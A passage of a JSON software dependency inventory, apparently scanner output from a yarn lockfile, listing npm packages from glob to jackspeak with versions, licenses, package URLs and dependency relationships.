"pkg:npm/glob@10.4.5", "UID": "aa8173cd075f0cb0" }, "Version": "10.4.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "foreground-child@3.3.1", "jackspeak@3.4.3", "minimatch@9.0.5", "minipass@7.1.2", "package-json-from-dist@1.0.1", "path-scurry@1.11.1" ], "Locations": [ { "StartLine": 5675, "EndLine": 5685 } ], "AnalyzedBy": "yarn" }, { "ID": "glob@11.0.3", "Name": "glob", "Identifier": { "PURL": "pkg:npm/glob@11.0.3", "UID": "3a0538ce88725972" }, "Version": "11.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "foreground-child@3.3.1", "jackspeak@4.1.1", "minimatch@10.0.3", "minipass@7.1.2", "package-json-from-dist@1.0.1", "path-scurry@2.0.0" ], "Locations": [ { "StartLine": 5687, "EndLine": 5695 } ], "AnalyzedBy": "yarn" }, { "ID": "glob@7.2.3", "Name": "glob", "Identifier": { "PURL": "pkg:npm/glob@7.2.3", "UID": "75ecb3389b997f94" }, "Version": "7.2.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fs.realpath@1.0.0", "inflight@1.0.6", "inherits@2.0.4", "minimatch@3.1.2", "once@1.4.0", "path-is-absolute@1.0.1" ], "Locations": [ { "StartLine": 5697, "EndLine": 5707 } ], "AnalyzedBy": "yarn" }, { "ID": "glob@9.3.5", "Name": "glob", "Identifier": { "PURL": "pkg:npm/glob@9.3.5", "UID": "270808f088f24fa4" }, "Version": "9.3.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fs.realpath@1.0.0", "minimatch@8.0.7", "minipass@4.2.8", "path-scurry@1.11.1" ], "Locations": [ { "StartLine": 5709, "EndLine": 5717 } ], "AnalyzedBy": "yarn" }, { "ID": "glob-parent@5.1.2", "Name": "glob-parent", "Identifier": { "PURL": "pkg:npm/glob-parent@5.1.2", "UID": "9f49ab769ff5ada7" }, "Version": "5.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-glob@4.0.3" ], "Locations": [ { "StartLine": 5639, "EndLine": 5644 } ], "AnalyzedBy": "yarn" }, { "ID": "gopd@1.2.0", "Name": "gopd", "Identifier": { "PURL": "pkg:npm/gopd@1.2.0", "UID": "7bd7b99e233d345" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5746, "EndLine": 5749 } ], "AnalyzedBy": "yarn" }, { "ID": "graceful-fs@4.2.11", "Name": "graceful-fs", "Identifier": { "PURL": "pkg:npm/graceful-fs@4.2.11", "UID": "e31cc83e64daa68f" }, "Version": "4.2.11", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5751, "EndLine": 5754 } ], "AnalyzedBy": "yarn" }, { "ID": "hard-rejection@2.1.0", "Name": "hard-rejection", "Identifier": { "PURL": "pkg:npm/hard-rejection@2.1.0", "UID": "ca8fa1b6d0002b34" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5761, "EndLine": 5764 } ], "AnalyzedBy": "yarn" }, { "ID": "has-flag@3.0.0", "Name": "has-flag", "Identifier": { "PURL": "pkg:npm/has-flag@3.0.0", "UID": "6c0a3047f6ed4c6e" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5771, "EndLine": 5774 } ], "AnalyzedBy": "yarn" }, { "ID": "has-flag@4.0.0", "Name": "has-flag", "Identifier": { "PURL": "pkg:npm/has-flag@4.0.0", "UID": "b9a4cc1feb7a434c" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5776, "EndLine": 5779 } ], "AnalyzedBy": "yarn" }, { "ID": "has-property-descriptors@1.0.2", "Name": "has-property-descriptors", "Identifier": { "PURL": "pkg:npm/has-property-descriptors@1.0.2", "UID": "d8c8acbddaabf6d7" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-define-property@1.0.1" ], "Locations": [ { "StartLine": 5781, "EndLine": 5786 } ], "AnalyzedBy": "yarn" }, { "ID": "has-symbols@1.1.0", "Name": "has-symbols", "Identifier": { "PURL": "pkg:npm/has-symbols@1.1.0", "UID": "52610d339152531b" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5795, "EndLine": 5798 } ], "AnalyzedBy": "yarn" }, { "ID": "has-tostringtag@1.0.2", "Name": "has-tostringtag", "Identifier": { "PURL": "pkg:npm/has-tostringtag@1.0.2", "UID": "991703b81668a744" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "has-symbols@1.1.0" ], "Locations": [ { "StartLine": 5800, "EndLine": 5805 } ], "AnalyzedBy": "yarn" }, { "ID": "has-unicode@2.0.1", "Name": "has-unicode", "Identifier": { "PURL": "pkg:npm/has-unicode@2.0.1", "UID": "9b33c524805d53a6" }, "Version": "2.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5807, "EndLine": 5810 } ], "AnalyzedBy": "yarn" }, { "ID": "hasown@2.0.2", "Name": "hasown", "Identifier": { "PURL": "pkg:npm/hasown@2.0.2", "UID": "e6cf7cab916cb357" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "function-bind@1.1.2" ], "Locations": [ { "StartLine": 5812, "EndLine": 5817 } ], "AnalyzedBy": "yarn" }, { "ID": "he@1.2.0", "Name": "he", "Identifier": { "PURL": "pkg:npm/he@1.2.0", "UID": "be5dbe9b48e79006" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5819, "EndLine": 5822 } ], "AnalyzedBy": "yarn" }, { "ID": "hermes-estree@0.29.1", "Name": "hermes-estree", "Identifier": { "PURL": "pkg:npm/hermes-estree@0.29.1", "UID": "d891375f99882bc" }, "Version": "0.29.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5824, "EndLine": 5827 } ], "AnalyzedBy": "yarn" }, { "ID": "hermes-estree@0.32.0", "Name": "hermes-estree", "Identifier": { "PURL": "pkg:npm/hermes-estree@0.32.0", "UID": "f7d36e2cf29ae081" }, "Version": "0.32.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5829, "EndLine": 5832 } ], "AnalyzedBy": "yarn" }, { "ID": "hermes-parser@0.29.1", "Name": "hermes-parser", "Identifier": { "PURL": "pkg:npm/hermes-parser@0.29.1", "UID": "ab186d03ec90d44e" }, "Version": "0.29.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hermes-estree@0.29.1" ], "Locations": [ { "StartLine": 5834, "EndLine": 5839 } ], "AnalyzedBy": "yarn" }, { "ID": "hermes-parser@0.32.0", "Name": "hermes-parser", "Identifier": { "PURL": "pkg:npm/hermes-parser@0.32.0", "UID": "87d75be6d36f105d" }, "Version": "0.32.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hermes-estree@0.32.0" ], "Locations": [ { "StartLine": 5841, "EndLine": 5846 } ], "AnalyzedBy": "yarn" }, { "ID": "hoist-non-react-statics@3.3.2", "Name": "hoist-non-react-statics", "Identifier": { "PURL": "pkg:npm/hoist-non-react-statics@3.3.2", "UID": "5a7a258a60a464b9" }, "Version": "3.3.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "react-is@16.13.1" ], "Locations": [ { "StartLine": 5848, "EndLine": 5853 } ], "AnalyzedBy": "yarn" }, { "ID": "hosted-git-info@2.8.9", "Name": "hosted-git-info", "Identifier": { "PURL": "pkg:npm/hosted-git-info@2.8.9", "UID": "11a85829f5cf60d5" }, "Version": "2.8.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5855, "EndLine": 5858 } ], "AnalyzedBy": "yarn" }, { "ID": "hosted-git-info@4.1.0", "Name": "hosted-git-info", "Identifier": { "PURL": "pkg:npm/hosted-git-info@4.1.0", "UID": "f4c56e36dd71866a" }, "Version": "4.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lru-cache@6.0.0" ], "Locations": [ { "StartLine": 5860, "EndLine": 5865 } ], "AnalyzedBy": "yarn" }, { "ID": "hosted-git-info@9.0.2", "Name": "hosted-git-info", "Identifier": { "PURL": "pkg:npm/hosted-git-info@9.0.2", "UID": "d8ab437625cce3ad" }, "Version": "9.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lru-cache@11.2.2" ], "Locations": [ { "StartLine": 5867, "EndLine": 5872 } ], "AnalyzedBy": "yarn" }, { "ID": "html2canvas@1.4.1", "Name": "html2canvas", "Identifier": { "PURL": "pkg:npm/html2canvas@1.4.1", "UID": "db4fc16c20e079b7" }, "Version": "1.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "css-line-break@2.1.0", "text-segmentation@1.0.3" ], "Locations": [ { "StartLine": 5879, "EndLine": 5885 } ], "AnalyzedBy": "yarn" }, { "ID": "http-cache-semantics@4.2.0", "Name": "http-cache-semantics", "Identifier": { "PURL": "pkg:npm/http-cache-semantics@4.2.0", "UID": "bada92707945977c" }, "Version": "4.2.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5892, "EndLine": 5895 } ], "AnalyzedBy": "yarn" }, { "ID": "http-errors@2.0.0", "Name": "http-errors", "Identifier": { "PURL": "pkg:npm/http-errors@2.0.0", "UID": "31cf8c58bed3ba1d" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "depd@2.0.0", "inherits@2.0.4", "setprototypeof@1.2.0", "statuses@2.0.1", "toidentifier@1.0.1" ], "Locations": [ { "StartLine": 5897, "EndLine": 5906 } ], "AnalyzedBy": "yarn" }, { "ID": "http-parser-js@0.5.10", "Name": "http-parser-js", "Identifier": { "PURL": "pkg:npm/http-parser-js@0.5.10", "UID": "73b8dc2f2700d9b4" }, "Version": "0.5.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5908, "EndLine": 5911 } ], "AnalyzedBy": "yarn" }, { "ID": "http-proxy-agent@7.0.2", "Name": "http-proxy-agent", "Identifier": { "PURL": "pkg:npm/http-proxy-agent@7.0.2", "UID": "9b9d2f2c7d3db354" }, "Version": "7.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "debug@4.4.3" ], "Locations": [ { "StartLine": 5922, "EndLine": 5928 } ], "AnalyzedBy": "yarn" }, { "ID": "https-proxy-agent@7.0.6", "Name": "https-proxy-agent", "Identifier": { "PURL": "pkg:npm/https-proxy-agent@7.0.6", "UID": "1aec7d3259366a67" }, "Version": "7.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "debug@4.4.3" ], "Locations": [ { "StartLine": 5946, "EndLine": 5952 } ], "AnalyzedBy": "yarn" }, { "ID": "human-signals@2.1.0", "Name": "human-signals", "Identifier": { "PURL": "pkg:npm/human-signals@2.1.0", "UID": "1c11515275c796b5" }, "Version": "2.1.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5954, "EndLine": 5957 } ], "AnalyzedBy": "yarn" }, { "ID": "iconv-lite@0.6.3", "Name": "iconv-lite", "Identifier": { "PURL": "pkg:npm/iconv-lite@0.6.3", "UID": "19c5df22ddcd6154" }, "Version": "0.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safer-buffer@2.1.2" ], "Locations": [ { "StartLine": 5966, "EndLine": 5971 } ], "AnalyzedBy": "yarn" }, { "ID": "idb@7.1.1", "Name": "idb", "Identifier": { "PURL": "pkg:npm/idb@7.1.1", "UID": "362630b7e5a8c251" }, "Version": "7.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5980, "EndLine": 5983 } ], "AnalyzedBy": "yarn" }, { "ID": "ieee754@1.2.1", "Name": "ieee754", "Identifier": { "PURL": "pkg:npm/ieee754@1.2.1", "UID": "ec620e92b7f4a4de" }, "Version": "1.2.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5985, "EndLine": 5988 } ], "AnalyzedBy": "yarn" }, { "ID": "ignore-walk@8.0.0", "Name": "ignore-walk", "Identifier": { "PURL": "pkg:npm/ignore-walk@8.0.0", "UID": "e7b5a23519200178" }, "Version": "8.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minimatch@10.0.3" ], "Locations": [ { "StartLine": 5990, "EndLine": 5995 } ], "AnalyzedBy": "yarn" }, { "ID": "image-size@1.2.1", "Name": "image-size", "Identifier": { "PURL": "pkg:npm/image-size@1.2.1", "UID": "2d445d5a2016a8e4" }, "Version": "1.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "queue@6.0.2" ], "Locations": [ { "StartLine": 6002, "EndLine": 6007 } ], "AnalyzedBy": "yarn" }, { "ID": "immediate@3.3.0", "Name": "immediate", "Identifier": { "PURL": "pkg:npm/immediate@3.3.0", "UID": "fa3d37f885cc500b" }, "Version": "3.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6009, "EndLine": 6012 } ], "AnalyzedBy": "yarn" }, { "ID": "import-fresh@3.3.1", "Name": "import-fresh", "Identifier": { "PURL": "pkg:npm/import-fresh@3.3.1", "UID": "7309239ae128ef70" }, "Version": "3.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "parent-module@1.0.1", "resolve-from@4.0.0" ], "Locations": [ { "StartLine": 6014, "EndLine": 6020 } ], "AnalyzedBy": "yarn" }, { "ID": "imurmurhash@0.1.4", "Name": "imurmurhash", "Identifier": { "PURL": "pkg:npm/imurmurhash@0.1.4", "UID": "61a5b9b8d8383da3" }, "Version": "0.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6030, "EndLine": 6033 } ], "AnalyzedBy": "yarn" }, { "ID": "indent-string@4.0.0", "Name": "indent-string", "Identifier": { "PURL": "pkg:npm/indent-string@4.0.0", "UID": "1804170b4224521d" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6035, "EndLine": 6038 } ], "AnalyzedBy": "yarn" }, { "ID": "inflight@1.0.6", "Name": "inflight", "Identifier": { "PURL": "pkg:npm/inflight@1.0.6", "UID": "b8032e5a5e24ebc4" }, "Version": "1.0.6", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "once@1.4.0", "wrappy@1.0.2" ], "Locations": [ { "StartLine": 6045, "EndLine": 6051 } ], "AnalyzedBy": "yarn" }, { "ID": "inherits@2.0.4", "Name": "inherits", "Identifier": { "PURL": "pkg:npm/inherits@2.0.4", "UID": "f85e9f5187c9f23c" }, "Version": "2.0.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6053, "EndLine": 6056 } ], "AnalyzedBy": "yarn" }, { "ID": "ini@1.3.8", "Name": "ini", "Identifier": { "PURL": "pkg:npm/ini@1.3.8", "UID": "1e67cd339256fa3" }, "Version": "1.3.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6061, "EndLine": 6064 } ], "AnalyzedBy": "yarn" }, { "ID": "ini@5.0.0", "Name": "ini", "Identifier": { "PURL": "pkg:npm/ini@5.0.0", "UID": "3d317573d7eb628b" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6058, "EndLine": 6059 } ], "AnalyzedBy": "yarn" }, { "ID": "init-package-json@8.2.2", "Name": "init-package-json", "Identifier": { "PURL": "pkg:npm/init-package-json@8.2.2", "UID": "d882df9e583c564e" }, "Version": "8.2.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/package-json@7.0.1", "npm-package-arg@13.0.1", "promzard@2.0.0", "read@4.1.0", "semver@7.7.3", "validate-npm-package-license@3.0.4", "validate-npm-package-name@6.0.2" ], "Locations": [ { "StartLine": 6066, "EndLine": 6075 } ], "AnalyzedBy": "yarn" }, { "ID": "invariant@2.2.4", "Name": "invariant", "Identifier": { "PURL": "pkg:npm/invariant@2.2.4", "UID": "c11a7588fab7cce2" }, "Version": "2.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0" ], "Locations": [ { "StartLine": 6091, "EndLine": 6096 } ], "AnalyzedBy": "yarn" }, { "ID": "ip-address@10.0.1", "Name": "ip-address", "Identifier": { "PURL": "pkg:npm/ip-address@10.0.1", "UID": "48c2ae1155dce8d7" }, "Version": "10.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6098, "EndLine": 6101 } ], "AnalyzedBy": "yarn" }, { "ID": "ip-regex@5.0.0", "Name": "ip-regex", "Identifier": { "PURL": "pkg:npm/ip-regex@5.0.0", "UID": "6238bf80a8b151ca" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6103, "EndLine": 6104 } ], "AnalyzedBy": "yarn" }, { "ID": "is-arguments@1.2.0", "Name": "is-arguments", "Identifier": { "PURL": "pkg:npm/is-arguments@1.2.0", "UID": "f70b301910fbc57" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "has-tostringtag@1.0.2" ], "Locations": [ { "StartLine": 6106, "EndLine": 6112 } ], "AnalyzedBy": "yarn" }, { "ID": "is-arrayish@0.2.1", "Name": "is-arrayish", "Identifier": { "PURL": "pkg:npm/is-arrayish@0.2.1", "UID": "73b6a7bd98d7c390" }, "Version": "0.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6123, "EndLine": 6126 } ], "AnalyzedBy": "yarn" }, { "ID": "is-arrayish@0.3.4", "Name": "is-arrayish", "Identifier": { "PURL": "pkg:npm/is-arrayish@0.3.4", "UID": "9f65c4056fbec95f" }, "Version": "0.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6128, "EndLine": 6131 } ], "AnalyzedBy": "yarn" }, { "ID": "is-callable@1.2.7", "Name": "is-callable", "Identifier": { "PURL": "pkg:npm/is-callable@1.2.7", "UID": "8edf74a14bcfb9a9" }, "Version": "1.2.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6159, "EndLine": 6162 } ], "AnalyzedBy": "yarn" }, { "ID": "is-cidr@6.0.1", "Name": "is-cidr", "Identifier": { "PURL": "pkg:npm/is-cidr@6.0.1", "UID": "3f12857d7fa9d4d" }, "Version": "6.0.1", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cidr-regex@5.0.1" ], "Locations": [ { "StartLine": 6164, "EndLine": 6167 } ], "AnalyzedBy": "yarn" }, { "ID": "is-core-module@2.16.1", "Name": "is-core-module", "Identifier": { "PURL": "pkg:npm/is-core-module@2.16.1", "UID": "435a86280b629497" }, "Version": "2.16.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hasown@2.0.2" ], "Locations": [ { "StartLine": 6169, "EndLine": 6174 } ], "AnalyzedBy": "yarn" }, { "ID": "is-docker@2.2.1", "Name": "is-docker", "Identifier": { "PURL": "pkg:npm/is-docker@2.2.1", "UID": "7150646db896876c" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6193, "EndLine": 6196 } ], "AnalyzedBy": "yarn" }, { "ID": "is-extglob@2.1.1", "Name": "is-extglob", "Identifier": { "PURL": "pkg:npm/is-extglob@2.1.1", "UID": "deb196edf14c0a70" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6198, "EndLine": 6201 } ], "AnalyzedBy": "yarn" }, { "ID": "is-fullwidth-code-point@1.0.0", "Name": "is-fullwidth-code-point", "Identifier": { "PURL": "pkg:npm/is-fullwidth-code-point@1.0.0", "UID": "9aba434413472fd3" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "number-is-nan@1.0.1" ], "Locations": [ { "StartLine": 6210, "EndLine": 6215 } ], "AnalyzedBy": "yarn" }, { "ID": "is-fullwidth-code-point@3.0.0", "Name": "is-fullwidth-code-point", "Identifier": { "PURL": "pkg:npm/is-fullwidth-code-point@3.0.0", "UID": "6d041b7467da170a" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6222, "EndLine": 6225 } ], "AnalyzedBy": "yarn" }, { "ID": "is-generator-function@1.1.2", "Name": "is-generator-function", "Identifier": { "PURL": "pkg:npm/is-generator-function@1.1.2", "UID": "882691e6a46f62a7" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "generator-function@2.0.1", "get-proto@1.0.1", "has-tostringtag@1.0.2", "safe-regex-test@1.1.0" ], "Locations": [ { "StartLine": 6232, "EndLine": 6241 } ], "AnalyzedBy": "yarn" }, { "ID": "is-glob@4.0.3", "Name": "is-glob", "Identifier": { "PURL": "pkg:npm/is-glob@4.0.3", "UID": "5dc7ed61f2b84896" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-extglob@2.1.1" ], "Locations": [ { "StartLine": 6243, "EndLine": 6248 } ], "AnalyzedBy": "yarn" }, { "ID": "is-interactive@1.0.0", "Name": "is-interactive", "Identifier": { "PURL": "pkg:npm/is-interactive@1.0.0", "UID": "a6d2805cdb60bd1b" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6250, "EndLine": 6253 } ], "AnalyzedBy": "yarn" }, { "ID": "is-number@7.0.0", "Name": "is-number", "Identifier": { "PURL": "pkg:npm/is-number@7.0.0", "UID": "77de49662ba3b280" }, "Version": "7.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6278, "EndLine": 6281 } ], "AnalyzedBy": "yarn" }, { "ID": "is-plain-obj@1.1.0", "Name": "is-plain-obj", "Identifier": { "PURL": "pkg:npm/is-plain-obj@1.1.0", "UID": "6af6d7702b0e7e5c" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6288, "EndLine": 6291 } ], "AnalyzedBy": "yarn" }, { "ID": "is-plain-obj@2.1.0", "Name": "is-plain-obj", "Identifier": { "PURL": "pkg:npm/is-plain-obj@2.1.0", "UID": "99fa369ae472baac" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6293, "EndLine": 6296 } ], "AnalyzedBy": "yarn" }, { "ID": "is-regex@1.2.1", "Name": "is-regex", "Identifier": { "PURL": "pkg:npm/is-regex@1.2.1", "UID": "646dadb40119e3" }, "Version": "1.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "gopd@1.2.0", "has-tostringtag@1.0.2", "hasown@2.0.2" ], "Locations": [ { "StartLine": 6298, "EndLine": 6306 } ], "AnalyzedBy": "yarn" }, { "ID": "is-stream@1.1.0", "Name": "is-stream", "Identifier": { "PURL": "pkg:npm/is-stream@1.1.0", "UID": "31724f830e0ef132" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6320, "EndLine": 6323 } ], "AnalyzedBy": "yarn" }, { "ID": "is-stream@2.0.1", "Name": "is-stream", "Identifier": { "PURL": "pkg:npm/is-stream@2.0.1", "UID": "8ca5bc1e2b109e0c" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6325, "EndLine": 6328 } ], "AnalyzedBy": "yarn" }, { "ID": "is-typed-array@1.1.15", "Name": "is-typed-array", "Identifier": { "PURL": "pkg:npm/is-typed-array@1.1.15", "UID": "53d4910600f816a5" }, "Version": "1.1.15", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "which-typed-array@1.1.19" ], "Locations": [ { "StartLine": 6347, "EndLine": 6352 } ], "AnalyzedBy": "yarn" }, { "ID": "is-unicode-supported@0.1.0", "Name": "is-unicode-supported", "Identifier": { "PURL": "pkg:npm/is-unicode-supported@0.1.0", "UID": "37f345fd7eacf5a5" }, "Version": "0.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6354, "EndLine": 6357 } ], "AnalyzedBy": "yarn" }, { "ID": "is-wsl@2.2.0", "Name": "is-wsl", "Identifier": { "PURL": "pkg:npm/is-wsl@2.2.0", "UID": "17bde44b63e6216d" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-docker@2.2.1" ], "Locations": [ { "StartLine": 6391, "EndLine": 6396 } ], "AnalyzedBy": "yarn" }, { "ID": "isarray@1.0.0", "Name": "isarray", "Identifier": { "PURL": "pkg:npm/isarray@1.0.0", "UID": "a9cb206f88f378ca" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6403, "EndLine": 6406 } ], "AnalyzedBy": "yarn" }, { "ID": "isexe@2.0.0", "Name": "isexe", "Identifier": { "PURL": "pkg:npm/isexe@2.0.0", "UID": "378303592b32e7d1" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6408, "EndLine": 6411 } ], "AnalyzedBy": "yarn" }, { "ID": "isexe@3.1.1", "Name": "isexe", "Identifier": { "PURL": "pkg:npm/isexe@3.1.1", "UID": "562290954cc277f0" }, "Version": "3.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6413, "EndLine": 6414 } ], "AnalyzedBy": "yarn" }, { "ID": "isomorphic-fetch@2.2.1", "Name": "isomorphic-fetch", "Identifier": { "PURL": "pkg:npm/isomorphic-fetch@2.2.1", "UID": "f638d59d12ec7766" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "node-fetch@1.7.3", "whatwg-fetch@3.6.20" ], "Locations": [ { "StartLine": 6416, "EndLine": 6422 } ], "AnalyzedBy": "yarn" }, { "ID": "istanbul-lib-coverage@3.2.2", "Name": "istanbul-lib-coverage", "Identifier": { "PURL": "pkg:npm/istanbul-lib-coverage@3.2.2", "UID": "8e1b152e1297d50e" }, "Version": "3.2.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6424, "EndLine": 6427 } ], "AnalyzedBy": "yarn" }, { "ID": "istanbul-lib-instrument@5.2.1", "Name": "istanbul-lib-instrument", "Identifier": { "PURL": "pkg:npm/istanbul-lib-instrument@5.2.1", "UID": "e3181a0242a2430b" }, "Version": "5.2.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/parser@7.28.4", "@istanbuljs/schema@0.1.3", "istanbul-lib-coverage@3.2.2", "semver@6.3.1" ], "Locations": [ { "StartLine": 6429, "EndLine": 6438 } ], "AnalyzedBy": "yarn" }, { "ID": "jackspeak@3.4.3", "Name": "jackspeak", "Identifier": { "PURL": "pkg:npm/jackspeak@3.4.3", "UID": "da89f5085cb684f2" }, "Version": "3.4.3", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/cliui@8.0.2" ], "Locations": [ { "StartLine": 6489, "EndLine": 6496 } ], "AnalyzedBy": "yarn" }, { "ID": "jackspeak@4.1.1", "Name": "jackspeak", "Identifier": { "PURL": "pkg:npm/jackspeak@4.1.1", "UID": "b2a3c04f65446070" }, "Version": "4.1.1", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/cliui@8.0.2" ], "Locations": [ { "StartLine": 6498, "EndLine": 6501 } ], "AnalyzedBy": "yarn" }, { 